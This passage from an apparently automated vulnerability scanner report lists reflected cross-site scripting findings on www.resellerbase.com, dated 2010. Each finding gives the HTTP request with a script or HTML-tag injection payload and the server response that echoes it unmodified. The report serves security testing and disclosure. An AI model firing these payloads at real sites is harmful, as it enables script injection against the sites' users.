<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adminb4de5<script>alert(1)</script>3300277d6f7/ was not found on this server.</p>
...[SNIP]...

2.10. http://www.resellerbase.com/admin/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/admin/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f94"><a>7160faa71c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3f94\"><a>7160faa71c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /admin/?e3f94"><a>7160faa71c3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:18:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Login Required</titl
...[SNIP]...
<input type="hidden" name="b" value="/admin/?e3f94\"><a>7160faa71c3=1" />
...[SNIP]...

2.11. http://www.resellerbase.com/adult/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1a724<script>alert(1)</script>c6b93586a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1a724<script>alert(1)</script>c6b93586a0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1a724<script>alert(1)</script>c6b93586a0/ was not found on this server.</p>
...[SNIP]...

2.12. http://www.resellerbase.com/adult/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1841<script>alert(1)</script>7a37c5847d6b5e05a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adulta1841<script>alert(1)</script>7a37c5847d6b5e05a/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adulta1841<script>alert(1)</script>7a37c5847d6b5e05a/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.13. http://www.resellerbase.com/adult/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9d349<script>alert(1)</script>6692d3178e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/?9d349<script>alert(1)</script>6692d3178e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/?9d349<script>alert(1)</script>6692d3178e1=1 was not found on this server.</p>
...[SNIP]...

2.14. http://www.resellerbase.com/adult/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 93ec0<a>0027d4a6da2 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f93ec0<a>0027d4a6da2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:29:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f93ec0<a>0027d4a6da2 was not found on this server.</p>
...[SNIP]...

2.15. http://www.resellerbase.com/adult/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 52684<script>alert(1)</script>55569787c12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult52684<script>alert(1)</script>55569787c12/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult52684<script>alert(1)</script>55569787c12/googlepr.php was not found on this server.</p>
...[SNIP]...

2.16. http://www.resellerbase.com/adult/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45489<script>alert(1)</script>234a8832dbb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/googlepr.php45489<script>alert(1)</script>234a8832dbb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/googlepr.php45489<script>alert(1)</script>234a8832dbb was not found on this server.</p>
...[SNIP]...

2.17. http://www.resellerbase.com/adult/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 16a39<a>74ee8bd7ee5 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/googlepr.php?link_id=1416a39<a>74ee8bd7ee5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/googlepr.php?link_id=1416a39<a>74ee8bd7ee5 was not found on this server.</p>
...[SNIP]...

2.18. http://www.resellerbase.com/adult/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 59375<script>alert(1)</script>7f947c6ef25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/googlepr.php?59375<script>alert(1)</script>7f947c6ef25=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/googlepr.php?59375<script>alert(1)</script>7f947c6ef25=1 was not found on this server.</p>
...[SNIP]...

2.19. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e05f<script>alert(1)</script>4396f3d42da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult2e05f<script>alert(1)</script>4396f3d42da/media-chat/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult2e05f<script>alert(1)</script>4396f3d42da/media-chat/ was not found on this server.</p>
...[SNIP]...

2.20. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be556<script>alert(1)</script>4c10239d375a927cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adultbe556<script>alert(1)</script>4c10239d375a927cf/media-chat/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultbe556<script>alert(1)</script>4c10239d375a927cf/media-chat/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.21. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5b4a7<script>alert(1)</script>e2bfbb56669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat5b4a7<script>alert(1)</script>e2bfbb56669/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat5b4a7<script>alert(1)</script>e2bfbb56669/ was not found on this server.</p>
...[SNIP]...

2.22. http://www.resellerbase.com/adult/media-chat/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4d351<script>alert(1)</script>709f7212f41f285e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/media-chat4d351<script>alert(1)</script>709f7212f41f285e5/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat4d351<script>alert(1)</script>709f7212f41f285e5/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.23. http://www.resellerbase.com/adult/media-chat/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6346e<script>alert(1)</script>090b8421ea5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/?6346e<script>alert(1)</script>090b8421ea5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/?6346e<script>alert(1)</script>090b8421ea5=1 was not found on this server.</p>
...[SNIP]...

2.24. http://www.resellerbase.com/adult/media-chat/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload a709d<a>3638cc1a55c was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa709d<a>3638cc1a55c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:29:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fa709d<a>3638cc1a55c was not found on this server.</p>
...[SNIP]...

2.25. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1ff17<script>alert(1)</script>30f6defefd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult1ff17<script>alert(1)</script>30f6defefd5/media-chat/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult1ff17<script>alert(1)</script>30f6defefd5/media-chat/googlepr.php was not found on this server.</p>
...[SNIP]...

2.26. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 273a1<script>alert(1)</script>cc4c2e3f0a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat273a1<script>alert(1)</script>cc4c2e3f0a5/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat273a1<script>alert(1)</script>cc4c2e3f0a5/googlepr.php was not found on this server.</p>
...[SNIP]...

2.27. http://www.resellerbase.com/adult/media-chat/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81bab<script>alert(1)</script>23f70528fec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/googlepr.php81bab<script>alert(1)</script>23f70528fec HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/googlepr.php81bab<script>alert(1)</script>23f70528fec was not found on this server.</p>
...[SNIP]...

2.28. http://www.resellerbase.com/adult/media-chat/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload 1c46f<a>37bbf2e3769 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/media-chat/googlepr.php?link_id=311c46f<a>37bbf2e3769 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/googlepr.php?link_id=311c46f<a>37bbf2e3769 was not found on this server.</p>
...[SNIP]...

2.29. http://www.resellerbase.com/adult/media-chat/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/googlepr.php

Issue detail

